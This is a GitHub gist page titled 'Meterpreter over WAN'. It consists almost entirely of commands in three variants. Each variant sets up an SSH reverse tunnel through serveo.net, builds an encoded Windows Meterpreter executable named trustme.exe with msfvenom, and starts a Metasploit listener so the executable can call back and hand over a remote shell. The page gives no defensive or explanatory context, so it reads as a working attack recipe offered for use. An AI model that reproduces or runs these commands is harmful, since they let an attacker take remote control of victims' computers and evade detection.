Skip to content

Instantly share code, notes, and snippets.

@pawiromitchel
Last active September 5, 2023 17:54
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
  • Save pawiromitchel/454b1cb9768409811298dc832c4ee0f7 to your computer and use it in GitHub Desktop.
Save pawiromitchel/454b1cb9768409811298dc832c4ee0f7 to your computer and use it in GitHub Desktop.
Meterpreter over WAN

Start the tunnel

Used autossh for persistant ssh session (reconnects when it breaks)

autossh -R trustme:80:localhost:80 serveo.net

Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_http LHOST=trustme.serveo.net LPORT=80 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe

Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LHOST 0.0.0.0;set LPORT 80;run;"

Start the tunnel

Used autossh for persistant ssh session (reconnects when it breaks)

autossh -R trustme:443:localhost:443 serveo.net

Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_https LHOST=trustme.serveo.net LPORT=443 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe

Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST 0.0.0.0;set LPORT 443;run;"

Start the tunnel

ssh -R 1492:localhost:1492 serveo.net

Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=serveo.net LPORT=1492 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe

Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT 1492;run;"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment